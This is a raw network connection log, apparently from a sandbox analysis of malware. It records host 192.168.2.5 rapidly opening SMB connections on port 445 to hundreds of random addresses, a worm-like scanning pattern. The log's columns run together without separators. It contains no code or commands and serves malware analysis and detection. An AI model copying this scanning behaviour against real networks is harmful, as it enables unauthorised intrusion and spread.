                                                        Dec 22, 2022 10:07:00.314457893 CET55932445192.168.2.5207.89.121.86
                                                        Dec 22, 2022 10:07:00.314583063 CET55933445192.168.2.5115.209.111.14
                                                        Dec 22, 2022 10:07:00.314670086 CET55934445192.168.2.554.102.205.129
                                                        Dec 22, 2022 10:07:00.314768076 CET55935445192.168.2.529.18.230.228
                                                        Dec 22, 2022 10:07:00.315001965 CET55938445192.168.2.592.106.163.199
                                                        Dec 22, 2022 10:07:00.315481901 CET55939445192.168.2.513.186.233.166
                                                        Dec 22, 2022 10:07:00.316129923 CET55940445192.168.2.5144.116.222.23
                                                        Dec 22, 2022 10:07:00.316627979 CET55941445192.168.2.532.231.129.189
                                                        Dec 22, 2022 10:07:00.317276955 CET55942445192.168.2.5123.195.70.171
                                                        Dec 22, 2022 10:07:00.317879915 CET55943445192.168.2.579.219.1.244
                                                        Dec 22, 2022 10:07:00.318331957 CET55945445192.168.2.5165.231.238.222
                                                        Dec 22, 2022 10:07:00.318486929 CET55947445192.168.2.5163.154.238.58
                                                        Dec 22, 2022 10:07:00.318957090 CET55951445192.168.2.510.103.144.102
                                                        Dec 22, 2022 10:07:00.319056988 CET55952445192.168.2.557.178.96.185
                                                        Dec 22, 2022 10:07:00.319694042 CET55955445192.168.2.5182.152.165.142
                                                        Dec 22, 2022 10:07:00.375219107 CET44555869220.158.7.46192.168.2.5
                                                        Dec 22, 2022 10:07:00.447053909 CET44555574142.219.19.2192.168.2.5
                                                        Dec 22, 2022 10:07:00.447087049 CET44555574142.219.19.2192.168.2.5
                                                        Dec 22, 2022 10:07:00.447109938 CET44555574142.219.19.2192.168.2.5
                                                        Dec 22, 2022 10:07:00.480277061 CET55888445192.168.2.541.203.13.102
                                                        Dec 22, 2022 10:07:00.514143944 CET55959445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:00.670310020 CET4455588841.203.13.102192.168.2.5
                                                        Dec 22, 2022 10:07:00.681598902 CET44555959142.219.19.3192.168.2.5
                                                        Dec 22, 2022 10:07:00.681793928 CET55959445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:00.691235065 CET55959445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:00.692919970 CET55963445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:00.856338978 CET55967445192.168.2.541.203.13.103
                                                        Dec 22, 2022 10:07:00.858809948 CET44555963142.219.19.3192.168.2.5
                                                        Dec 22, 2022 10:07:00.858987093 CET55963445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:00.859047890 CET55963445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:01.230439901 CET55959445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:01.312114000 CET55963445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:01.418869972 CET55975445192.168.2.5139.70.10.253
                                                        Dec 22, 2022 10:07:01.419413090 CET55978445192.168.2.5203.245.148.97
                                                        Dec 22, 2022 10:07:01.420485020 CET55989445192.168.2.52.175.206.142
                                                        Dec 22, 2022 10:07:01.421230078 CET55993445192.168.2.5184.14.119.5
                                                        Dec 22, 2022 10:07:01.421480894 CET55994445192.168.2.53.110.96.53
                                                        Dec 22, 2022 10:07:01.421808004 CET55996445192.168.2.5115.234.149.182
                                                        Dec 22, 2022 10:07:01.422040939 CET55998445192.168.2.5150.9.16.106
                                                        Dec 22, 2022 10:07:01.422672033 CET56002445192.168.2.535.111.18.200
                                                        Dec 22, 2022 10:07:01.422789097 CET56003445192.168.2.518.254.183.155
                                                        Dec 22, 2022 10:07:01.423080921 CET56004445192.168.2.5165.211.87.39
                                                        Dec 22, 2022 10:07:01.423244953 CET56005445192.168.2.525.31.214.96
                                                        Dec 22, 2022 10:07:01.423410892 CET56006445192.168.2.5218.108.161.134
                                                        Dec 22, 2022 10:07:01.423815966 CET56009445192.168.2.577.149.100.179
                                                        Dec 22, 2022 10:07:01.424757957 CET56010445192.168.2.5187.196.187.128
                                                        Dec 22, 2022 10:07:01.434036016 CET56011445192.168.2.5204.14.62.147
                                                        Dec 22, 2022 10:07:01.434660912 CET56012445192.168.2.5130.113.237.205
                                                        Dec 22, 2022 10:07:01.435378075 CET56013445192.168.2.5125.56.43.246
                                                        Dec 22, 2022 10:07:01.435895920 CET56014445192.168.2.5182.221.56.94
                                                        Dec 22, 2022 10:07:01.436194897 CET56016445192.168.2.5129.59.68.133
                                                        Dec 22, 2022 10:07:01.436367035 CET56018445192.168.2.5164.228.3.117
                                                        Dec 22, 2022 10:07:01.436808109 CET56022445192.168.2.512.7.225.22
                                                        Dec 22, 2022 10:07:01.436891079 CET56023445192.168.2.5116.36.67.18
                                                        Dec 22, 2022 10:07:01.437119007 CET56026445192.168.2.5107.51.57.112
                                                        Dec 22, 2022 10:07:01.437546015 CET56030445192.168.2.564.230.162.31
                                                        Dec 22, 2022 10:07:01.437781096 CET56033445192.168.2.5102.134.71.74
                                                        Dec 22, 2022 10:07:01.746340990 CET56039445192.168.2.588.218.188.23
                                                        Dec 22, 2022 10:07:01.794001102 CET4455603988.218.188.23192.168.2.5
                                                        Dec 22, 2022 10:07:01.794138908 CET56039445192.168.2.588.218.188.23
                                                        Dec 22, 2022 10:07:01.794173002 CET56039445192.168.2.588.218.188.23
                                                        Dec 22, 2022 10:07:01.841732979 CET4455603988.218.188.23192.168.2.5
                                                        Dec 22, 2022 10:07:01.841875076 CET56039445192.168.2.588.218.188.23
                                                        Dec 22, 2022 10:07:01.856030941 CET55963445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:01.890141010 CET4455603988.218.188.23192.168.2.5
                                                        Dec 22, 2022 10:07:01.890347004 CET56039445192.168.2.588.218.188.23
                                                        Dec 22, 2022 10:07:01.934004068 CET56045445192.168.2.541.203.13.104
                                                        Dec 22, 2022 10:07:01.940442085 CET4455603988.218.188.23192.168.2.5
                                                        Dec 22, 2022 10:07:01.965492010 CET56046445192.168.2.538.35.118.14
                                                        Dec 22, 2022 10:07:01.997919083 CET56047445192.168.2.588.218.188.24
                                                        Dec 22, 2022 10:07:02.148202896 CET4455604638.35.118.14192.168.2.5
                                                        Dec 22, 2022 10:07:02.148416042 CET56046445192.168.2.538.35.118.14
                                                        Dec 22, 2022 10:07:02.148526907 CET56046445192.168.2.538.35.118.14
                                                        Dec 22, 2022 10:07:02.214802027 CET55959445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:02.246232986 CET44555496149.248.216.2192.168.2.5
                                                        Dec 22, 2022 10:07:02.318397045 CET56052445192.168.2.5149.248.216.3
                                                        Dec 22, 2022 10:07:02.329170942 CET4455604638.35.118.14192.168.2.5
                                                        Dec 22, 2022 10:07:02.329314947 CET56046445192.168.2.538.35.118.14
                                                        Dec 22, 2022 10:07:02.345021963 CET44556052149.248.216.3192.168.2.5
                                                        Dec 22, 2022 10:07:02.345144033 CET56052445192.168.2.5149.248.216.3
                                                        Dec 22, 2022 10:07:02.345300913 CET56052445192.168.2.5149.248.216.3
                                                        Dec 22, 2022 10:07:02.345840931 CET56053445192.168.2.5149.248.216.3
                                                        Dec 22, 2022 10:07:02.372174978 CET44556053149.248.216.3192.168.2.5
                                                        Dec 22, 2022 10:07:02.372329950 CET56053445192.168.2.5149.248.216.3
                                                        Dec 22, 2022 10:07:02.372378111 CET56053445192.168.2.5149.248.216.3
                                                        Dec 22, 2022 10:07:02.372891903 CET44556052149.248.216.3192.168.2.5
                                                        Dec 22, 2022 10:07:02.398865938 CET44556053149.248.216.3192.168.2.5
                                                        Dec 22, 2022 10:07:02.510164022 CET4455604638.35.118.14192.168.2.5
                                                        Dec 22, 2022 10:07:02.511539936 CET56046445192.168.2.538.35.118.14
                                                        Dec 22, 2022 10:07:02.544028044 CET56066445192.168.2.576.95.163.214
                                                        Dec 22, 2022 10:07:02.544365883 CET56070445192.168.2.5116.131.11.231
                                                        Dec 22, 2022 10:07:02.544648886 CET56073445192.168.2.548.107.32.248
                                                        Dec 22, 2022 10:07:02.544853926 CET56075445192.168.2.523.65.64.165
                                                        Dec 22, 2022 10:07:02.544924021 CET56076445192.168.2.5204.211.200.79
                                                        Dec 22, 2022 10:07:02.545190096 CET56080445192.168.2.597.251.96.192
                                                        Dec 22, 2022 10:07:02.545321941 CET56081445192.168.2.5100.89.61.249
                                                        Dec 22, 2022 10:07:02.545450926 CET56082445192.168.2.5160.252.73.195
                                                        Dec 22, 2022 10:07:02.545519114 CET56083445192.168.2.5121.20.49.190
                                                        Dec 22, 2022 10:07:02.545658112 CET56084445192.168.2.592.235.42.112
                                                        Dec 22, 2022 10:07:02.546046972 CET56087445192.168.2.577.25.121.26
                                                        Dec 22, 2022 10:07:02.546479940 CET56090445192.168.2.574.42.5.25
                                                        Dec 22, 2022 10:07:02.546538115 CET56091445192.168.2.5206.17.53.36
                                                        Dec 22, 2022 10:07:02.546926975 CET56096445192.168.2.537.249.234.5
                                                        Dec 22, 2022 10:07:02.547137976 CET56098445192.168.2.552.50.67.91
                                                        Dec 22, 2022 10:07:02.547169924 CET56099445192.168.2.584.189.141.180
                                                        Dec 22, 2022 10:07:02.547502995 CET56103445192.168.2.534.22.59.39
                                                        Dec 22, 2022 10:07:02.547684908 CET56106445192.168.2.5107.191.198.40
                                                        Dec 22, 2022 10:07:02.547908068 CET56109445192.168.2.5164.116.12.42
                                                        Dec 22, 2022 10:07:02.548001051 CET56110445192.168.2.59.26.234.244
                                                        Dec 22, 2022 10:07:02.548382998 CET56088445192.168.2.5181.233.233.25
                                                        Dec 22, 2022 10:07:02.550087929 CET56114445192.168.2.59.75.21.10
                                                        Dec 22, 2022 10:07:02.550331116 CET56115445192.168.2.557.166.247.245
                                                        Dec 22, 2022 10:07:02.550333977 CET56117445192.168.2.5148.66.25.56
                                                        Dec 22, 2022 10:07:02.550376892 CET56116445192.168.2.566.190.42.44
                                                        Dec 22, 2022 10:07:02.693517923 CET4455604638.35.118.14192.168.2.5
                                                        Dec 22, 2022 10:07:02.787499905 CET56121445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:02.855469942 CET55963445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:02.958935976 CET4455612138.35.118.15192.168.2.5
                                                        Dec 22, 2022 10:07:02.959202051 CET56121445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:02.959532976 CET56121445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:02.960340977 CET56125445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:02.996490955 CET56127445192.168.2.541.203.13.105
                                                        Dec 22, 2022 10:07:03.059247971 CET56130445192.168.2.588.218.188.25
                                                        Dec 22, 2022 10:07:03.131023884 CET4455612138.35.118.15192.168.2.5
                                                        Dec 22, 2022 10:07:03.131068945 CET4455612138.35.118.15192.168.2.5
                                                        Dec 22, 2022 10:07:03.134865046 CET4455612538.35.118.15192.168.2.5
                                                        Dec 22, 2022 10:07:03.135001898 CET56125445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:03.135049105 CET56125445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:03.310076952 CET4455612538.35.118.15192.168.2.5
                                                        Dec 22, 2022 10:07:03.310265064 CET56125445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:03.485270977 CET4455612538.35.118.15192.168.2.5
                                                        Dec 22, 2022 10:07:03.485563993 CET56125445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:03.653345108 CET56141445192.168.2.530.26.232.22
                                                        Dec 22, 2022 10:07:03.653501034 CET56143445192.168.2.530.71.9.60
                                                        Dec 22, 2022 10:07:03.653822899 CET56145445192.168.2.523.9.24.50
                                                        Dec 22, 2022 10:07:03.654433966 CET56150445192.168.2.5194.109.184.47
                                                        Dec 22, 2022 10:07:03.654639959 CET56153445192.168.2.5186.221.5.171
                                                        Dec 22, 2022 10:07:03.654890060 CET56154445192.168.2.523.148.194.3
                                                        Dec 22, 2022 10:07:03.655072927 CET56155445192.168.2.561.66.108.60
                                                        Dec 22, 2022 10:07:03.655630112 CET56161445192.168.2.588.226.173.237
                                                        Dec 22, 2022 10:07:03.655853987 CET56163445192.168.2.512.105.160.119
                                                        Dec 22, 2022 10:07:03.655946016 CET56164445192.168.2.5206.144.74.83
                                                        Dec 22, 2022 10:07:03.656331062 CET56165445192.168.2.514.131.121.54
                                                        Dec 22, 2022 10:07:03.656732082 CET56167445192.168.2.573.214.156.15
                                                        Dec 22, 2022 10:07:03.656774044 CET56170445192.168.2.5162.2.7.51
                                                        Dec 22, 2022 10:07:03.656841040 CET56169445192.168.2.550.252.90.109
                                                        Dec 22, 2022 10:07:03.656930923 CET56171445192.168.2.5143.217.25.100
                                                        Dec 22, 2022 10:07:03.657491922 CET56175445192.168.2.5199.131.88.135
                                                        Dec 22, 2022 10:07:03.657587051 CET56176445192.168.2.587.32.83.212
                                                        Dec 22, 2022 10:07:03.657833099 CET56177445192.168.2.5169.213.33.11
                                                        Dec 22, 2022 10:07:03.658083916 CET56180445192.168.2.5176.205.130.13
                                                        Dec 22, 2022 10:07:03.658335924 CET56183445192.168.2.5101.22.29.214
                                                        Dec 22, 2022 10:07:03.661583900 CET4455612538.35.118.15192.168.2.5
                                                        Dec 22, 2022 10:07:03.662156105 CET56194445192.168.2.546.154.219.206
                                                        Dec 22, 2022 10:07:03.662312031 CET56195445192.168.2.5186.165.18.43
                                                        Dec 22, 2022 10:07:03.662432909 CET56196445192.168.2.5222.184.182.229
                                                        Dec 22, 2022 10:07:03.662441969 CET56197445192.168.2.599.119.153.217
                                                        Dec 22, 2022 10:07:03.662522078 CET56198445192.168.2.533.143.47.157
                                                        Dec 22, 2022 10:07:04.074671984 CET56205445192.168.2.541.203.13.106
                                                        Dec 22, 2022 10:07:04.121733904 CET56207445192.168.2.588.218.188.26
                                                        Dec 22, 2022 10:07:04.167258024 CET4455620788.218.188.26192.168.2.5
                                                        Dec 22, 2022 10:07:04.183825016 CET55959445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:04.264961958 CET4455620541.203.13.106192.168.2.5
                                                        Dec 22, 2022 10:07:04.668313980 CET56207445192.168.2.588.218.188.26
                                                        Dec 22, 2022 10:07:04.713704109 CET4455620788.218.188.26192.168.2.5
                                                        Dec 22, 2022 10:07:04.777611017 CET56205445192.168.2.541.203.13.106
                                                        Dec 22, 2022 10:07:04.778126955 CET56222445192.168.2.5202.18.68.22
                                                        Dec 22, 2022 10:07:04.778280020 CET56223445192.168.2.574.31.252.132
                                                        Dec 22, 2022 10:07:04.778419018 CET56224445192.168.2.5198.139.43.187
                                                        Dec 22, 2022 10:07:04.779035091 CET56232445192.168.2.5188.203.215.227
                                                        Dec 22, 2022 10:07:04.779129028 CET56233445192.168.2.5112.221.59.131
                                                        Dec 22, 2022 10:07:04.779274940 CET56234445192.168.2.5220.225.125.246
                                                        Dec 22, 2022 10:07:04.779392958 CET56235445192.168.2.523.134.231.222
                                                        Dec 22, 2022 10:07:04.779979944 CET56241445192.168.2.563.67.207.20
                                                        Dec 22, 2022 10:07:04.780283928 CET56243445192.168.2.5101.176.249.103
                                                        Dec 22, 2022 10:07:04.780451059 CET56244445192.168.2.578.233.246.131
                                                        Dec 22, 2022 10:07:04.780579090 CET56245445192.168.2.593.194.16.149
                                                        Dec 22, 2022 10:07:04.780812025 CET56247445192.168.2.542.90.100.7
                                                        Dec 22, 2022 10:07:04.781027079 CET56249445192.168.2.5167.117.152.211
                                                        Dec 22, 2022 10:07:04.781184912 CET56250445192.168.2.5149.191.228.163
                                                        Dec 22, 2022 10:07:04.781357050 CET56251445192.168.2.585.21.100.109
                                                        Dec 22, 2022 10:07:04.781706095 CET56255445192.168.2.5180.96.91.37
                                                        Dec 22, 2022 10:07:04.781817913 CET56256445192.168.2.560.134.192.1
                                                        Dec 22, 2022 10:07:04.782063961 CET56258445192.168.2.5213.214.101.95
                                                        Dec 22, 2022 10:07:04.782388926 CET56261445192.168.2.5213.94.26.144
                                                        Dec 22, 2022 10:07:04.782716036 CET56264445192.168.2.543.224.90.207
                                                        Dec 22, 2022 10:07:04.784162045 CET56274445192.168.2.548.148.60.191
                                                        Dec 22, 2022 10:07:04.784703970 CET56275445192.168.2.5198.113.153.155
                                                        Dec 22, 2022 10:07:04.785358906 CET56276445192.168.2.543.85.120.73
                                                        Dec 22, 2022 10:07:04.785934925 CET56277445192.168.2.529.51.45.168
                                                        Dec 22, 2022 10:07:04.786570072 CET56278445192.168.2.5178.45.67.249
                                                        Dec 22, 2022 10:07:04.840054035 CET55963445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:04.967257977 CET4455620541.203.13.106192.168.2.5
                                                        Dec 22, 2022 10:07:05.078257084 CET4455625660.134.192.1192.168.2.5
                                                        Dec 22, 2022 10:07:05.155040026 CET56283445192.168.2.541.203.13.107
                                                        Dec 22, 2022 10:07:05.200622082 CET56286445192.168.2.588.218.188.27
                                                        Dec 22, 2022 10:07:05.246165037 CET4455628688.218.188.27192.168.2.5
                                                        Dec 22, 2022 10:07:05.348949909 CET4455628341.203.13.107192.168.2.5
                                                        Dec 22, 2022 10:07:05.590090990 CET56256445192.168.2.560.134.192.1
                                                        Dec 22, 2022 10:07:05.746546984 CET56286445192.168.2.588.218.188.27
                                                        Dec 22, 2022 10:07:05.792273998 CET4455628688.218.188.27192.168.2.5
                                                        Dec 22, 2022 10:07:05.855817080 CET56283445192.168.2.541.203.13.107
                                                        Dec 22, 2022 10:07:05.886712074 CET4455625660.134.192.1192.168.2.5
                                                        Dec 22, 2022 10:07:05.902014017 CET44555959142.219.19.3192.168.2.5
                                                        Dec 22, 2022 10:07:05.902086020 CET44555959142.219.19.3192.168.2.5
                                                        Dec 22, 2022 10:07:05.902136087 CET44555959142.219.19.3192.168.2.5
                                                        Dec 22, 2022 10:07:05.905085087 CET56304445192.168.2.563.169.16.210
                                                        Dec 22, 2022 10:07:05.905411959 CET56307445192.168.2.544.245.6.4
                                                        Dec 22, 2022 10:07:05.905570984 CET56310445192.168.2.5191.215.66.206
                                                        Dec 22, 2022 10:07:05.905728102 CET56312445192.168.2.589.163.201.169
                                                        Dec 22, 2022 10:07:05.905821085 CET56313445192.168.2.5186.103.219.199
                                                        Dec 22, 2022 10:07:05.906120062 CET56317445192.168.2.5210.209.209.232
                                                        Dec 22, 2022 10:07:05.906281948 CET56318445192.168.2.580.47.26.141
                                                        Dec 22, 2022 10:07:05.906363010 CET56319445192.168.2.5221.67.78.131
                                                        Dec 22, 2022 10:07:05.906613111 CET56321445192.168.2.566.56.130.70
                                                        Dec 22, 2022 10:07:05.906788111 CET56323445192.168.2.5159.36.146.126
                                                        Dec 22, 2022 10:07:05.906909943 CET56324445192.168.2.598.199.179.92
                                                        Dec 22, 2022 10:07:05.907036066 CET56325445192.168.2.5133.62.132.72
                                                        Dec 22, 2022 10:07:05.916057110 CET56327445192.168.2.569.249.15.109
                                                        Dec 22, 2022 10:07:05.916765928 CET56333445192.168.2.5144.243.224.115
                                                        Dec 22, 2022 10:07:05.916968107 CET56334445192.168.2.5108.253.10.45
                                                        Dec 22, 2022 10:07:05.917053938 CET56335445192.168.2.595.90.112.45
                                                        Dec 22, 2022 10:07:05.917145014 CET56336445192.168.2.554.222.7.199
                                                        Dec 22, 2022 10:07:05.917582989 CET56344445192.168.2.5142.55.64.241
                                                        Dec 22, 2022 10:07:05.917743921 CET56346445192.168.2.53.172.237.96
                                                        Dec 22, 2022 10:07:05.917751074 CET56345445192.168.2.583.215.97.124
                                                        Dec 22, 2022 10:07:05.919639111 CET56354445192.168.2.581.81.50.86
                                                        Dec 22, 2022 10:07:05.919698954 CET56355445192.168.2.5178.1.10.209
                                                        Dec 22, 2022 10:07:05.919835091 CET56356445192.168.2.5177.168.113.202
                                                        Dec 22, 2022 10:07:05.919835091 CET56357445192.168.2.573.237.8.124
                                                        Dec 22, 2022 10:07:05.919898033 CET56358445192.168.2.5164.34.135.186
                                                        Dec 22, 2022 10:07:06.047574997 CET44555963142.219.19.3192.168.2.5
                                                        Dec 22, 2022 10:07:06.047605991 CET44555963142.219.19.3192.168.2.5
                                                        Dec 22, 2022 10:07:06.047630072 CET44555963142.219.19.3192.168.2.5
                                                        Dec 22, 2022 10:07:06.049823046 CET4455628341.203.13.107192.168.2.5
                                                        Dec 22, 2022 10:07:06.231173038 CET56364445192.168.2.541.203.13.108
                                                        Dec 22, 2022 10:07:06.262412071 CET56365445192.168.2.588.218.188.28
                                                        Dec 22, 2022 10:07:06.421046972 CET4455636441.203.13.108192.168.2.5
                                                        Dec 22, 2022 10:07:06.668931007 CET56376445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:06.746532917 CET55416445192.168.2.5155.100.133.2
                                                        Dec 22, 2022 10:07:06.809509993 CET56377445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:06.843307972 CET4455637638.35.118.15192.168.2.5
                                                        Dec 22, 2022 10:07:06.845415115 CET56376445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:06.845515013 CET56376445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:06.934071064 CET56364445192.168.2.541.203.13.108
                                                        Dec 22, 2022 10:07:06.961474895 CET44556377155.100.133.3192.168.2.5
                                                        Dec 22, 2022 10:07:06.961747885 CET56377445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:06.962343931 CET56382445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:07.017555952 CET56383445192.168.2.594.160.39.250
                                                        Dec 22, 2022 10:07:07.017555952 CET56384445192.168.2.5202.40.174.116
                                                        Dec 22, 2022 10:07:07.017832041 CET56385445192.168.2.5122.24.131.246
                                                        Dec 22, 2022 10:07:07.018932104 CET56393445192.168.2.5219.181.63.35
                                                        Dec 22, 2022 10:07:07.019095898 CET56394445192.168.2.532.141.5.208
                                                        Dec 22, 2022 10:07:07.019449949 CET56396445192.168.2.5185.144.208.144
                                                        Dec 22, 2022 10:07:07.020081997 CET4455637638.35.118.15192.168.2.5
                                                        Dec 22, 2022 10:07:07.020172119 CET56376445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:07.020768881 CET56405445192.168.2.5147.182.245.74
                                                        Dec 22, 2022 10:07:07.021049023 CET56406445192.168.2.575.89.92.90
                                                        Dec 22, 2022 10:07:07.021399975 CET56407445192.168.2.5169.29.214.111
                                                        Dec 22, 2022 10:07:07.021850109 CET56409445192.168.2.546.217.200.177
                                                        Dec 22, 2022 10:07:07.023813963 CET56411445192.168.2.5195.144.99.211
                                                        Dec 22, 2022 10:07:07.035825014 CET56412445192.168.2.524.176.74.76
                                                        Dec 22, 2022 10:07:07.036530972 CET56413445192.168.2.585.74.152.148
                                                        Dec 22, 2022 10:07:07.036890984 CET56415445192.168.2.519.17.143.132
                                                        Dec 22, 2022 10:07:07.037795067 CET56421445192.168.2.511.142.234.224
                                                        Dec 22, 2022 10:07:07.038829088 CET56427445192.168.2.56.119.128.139
                                                        Dec 22, 2022 10:07:07.039203882 CET56430445192.168.2.5223.134.27.33
                                                        Dec 22, 2022 10:07:07.039741039 CET56433445192.168.2.5179.43.165.174
                                                        Dec 22, 2022 10:07:07.040018082 CET56435445192.168.2.545.76.122.50
                                                        Dec 22, 2022 10:07:07.040175915 CET56436445192.168.2.555.18.1.187
                                                        Dec 22, 2022 10:07:07.041131973 CET56438445192.168.2.567.33.202.116
                                                        Dec 22, 2022 10:07:07.042098999 CET56439445192.168.2.5207.48.101.140
                                                        Dec 22, 2022 10:07:07.042798042 CET56440445192.168.2.5215.170.199.238
                                                        Dec 22, 2022 10:07:07.043792009 CET56441445192.168.2.593.110.194.115
                                                        Dec 22, 2022 10:07:07.044547081 CET56442445192.168.2.585.136.151.223
                                                        Dec 22, 2022 10:07:07.114181042 CET44556382155.100.133.3192.168.2.5
                                                        Dec 22, 2022 10:07:07.114298105 CET56382445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:07.124099970 CET4455636441.203.13.108192.168.2.5
                                                        Dec 22, 2022 10:07:07.194830894 CET4455637638.35.118.15192.168.2.5
                                                        Dec 22, 2022 10:07:07.195019007 CET56376445192.168.2.538.35.118.15
                                                        Dec 22, 2022 10:07:07.288583040 CET44556430223.134.27.33192.168.2.5
                                                        Dec 22, 2022 10:07:07.294085979 CET56447445192.168.2.541.203.13.109
                                                        Dec 22, 2022 10:07:07.346514940 CET56449445192.168.2.588.218.188.29
                                                        Dec 22, 2022 10:07:07.369601011 CET4455637638.35.118.15192.168.2.5
                                                        Dec 22, 2022 10:07:07.418387890 CET56377445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:07.436522961 CET56452445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:07.483609915 CET4455644741.203.13.109192.168.2.5
                                                        Dec 22, 2022 10:07:07.574632883 CET56382445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:07.617356062 CET4455645238.35.118.16192.168.2.5
                                                        Dec 22, 2022 10:07:07.617485046 CET56452445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:07.617749929 CET56452445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:07.618403912 CET56457445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:07.789494038 CET4455645738.35.118.16192.168.2.5
                                                        Dec 22, 2022 10:07:07.789657116 CET56457445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:07.789715052 CET56457445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:07.793416977 CET56430445192.168.2.5223.134.27.33
                                                        Dec 22, 2022 10:07:07.798227072 CET4455645238.35.118.16192.168.2.5
                                                        Dec 22, 2022 10:07:07.798266888 CET4455645238.35.118.16192.168.2.5
                                                        Dec 22, 2022 10:07:07.856123924 CET56377445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:07.961185932 CET4455645738.35.118.16192.168.2.5
                                                        Dec 22, 2022 10:07:07.961302996 CET56457445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:08.002680063 CET56447445192.168.2.541.203.13.109
                                                        Dec 22, 2022 10:07:08.002685070 CET56382445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:08.042918921 CET44556430223.134.27.33192.168.2.5
                                                        Dec 22, 2022 10:07:08.121958017 CET56466445192.168.2.530.40.7.138
                                                        Dec 22, 2022 10:07:08.121985912 CET56467445192.168.2.5201.118.103.254
                                                        Dec 22, 2022 10:07:08.122225046 CET56469445192.168.2.5184.78.16.18
                                                        Dec 22, 2022 10:07:08.122549057 CET56474445192.168.2.5149.76.221.10
                                                        Dec 22, 2022 10:07:08.122672081 CET56477445192.168.2.533.208.248.31
                                                        Dec 22, 2022 10:07:08.122765064 CET56478445192.168.2.535.219.132.253
                                                        Dec 22, 2022 10:07:08.123289108 CET56488445192.168.2.510.134.88.121
                                                        Dec 22, 2022 10:07:08.123395920 CET56490445192.168.2.5221.200.108.34
                                                        Dec 22, 2022 10:07:08.123398066 CET56489445192.168.2.5185.223.214.175
                                                        Dec 22, 2022 10:07:08.123536110 CET56492445192.168.2.5165.159.119.160
                                                        Dec 22, 2022 10:07:08.123667002 CET56494445192.168.2.541.166.226.100
                                                        Dec 22, 2022 10:07:08.132601023 CET4455645738.35.118.16192.168.2.5
                                                        Dec 22, 2022 10:07:08.132718086 CET56457445192.168.2.538.35.118.16
                                                        Dec 22, 2022 10:07:08.157335997 CET56495445192.168.2.5161.174.121.58
                                                        Dec 22, 2022 10:07:08.158076048 CET56496445192.168.2.5209.61.68.249
                                                        Dec 22, 2022 10:07:08.158941031 CET56497445192.168.2.5217.49.37.206
                                                        Dec 22, 2022 10:07:08.159363031 CET56499445192.168.2.5108.254.77.158
                                                        Dec 22, 2022 10:07:08.159513950 CET56500445192.168.2.531.100.219.229
                                                        Dec 22, 2022 10:07:08.159671068 CET56501445192.168.2.5143.110.90.240
                                                        Dec 22, 2022 10:07:08.160020113 CET56505445192.168.2.5181.203.73.238
                                                        Dec 22, 2022 10:07:08.160209894 CET56508445192.168.2.551.215.28.184
                                                        Dec 22, 2022 10:07:08.160552025 CET56514445192.168.2.5140.68.201.234
                                                        Dec 22, 2022 10:07:08.160890102 CET56520445192.168.2.5124.40.62.149
                                                        Dec 22, 2022 10:07:08.161048889 CET56523445192.168.2.5221.40.123.198
                                                        Dec 22, 2022 10:07:08.161097050 CET56522445192.168.2.547.187.127.112
                                                        Dec 22, 2022 10:07:08.169660091 CET56524445192.168.2.5216.20.43.66
                                                        Dec 22, 2022 10:07:08.169924021 CET56525445192.168.2.59.136.249.98
                                                        Dec 22, 2022 10:07:08.192055941 CET4455644741.203.13.109192.168.2.5
                                                        Dec 22, 2022 10:07:08.303890944 CET4455645738.35.118.16192.168.2.5
                                                        Dec 22, 2022 10:07:08.372306108 CET56530445192.168.2.541.203.13.110
                                                        Dec 22, 2022 10:07:08.418863058 CET56532445192.168.2.588.218.188.30
                                                        Dec 22, 2022 10:07:08.561541080 CET4455653041.203.13.110192.168.2.5
                                                        Dec 22, 2022 10:07:08.746874094 CET56377445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:08.902900934 CET56382445192.168.2.5155.100.133.3
                                                        Dec 22, 2022 10:07:09.059844017 CET56544445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:09.074779034 CET56530445192.168.2.541.203.13.110
                                                        Dec 22, 2022 10:07:09.225805998 CET44556544142.219.19.3192.168.2.5
                                                        Dec 22, 2022 10:07:09.226028919 CET56544445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:09.226094007 CET56544445192.168.2.5142.219.19.3
                                                        Dec 22, 2022 10:07:09.231436968 CET56549445192.168.2.583.220.90.241
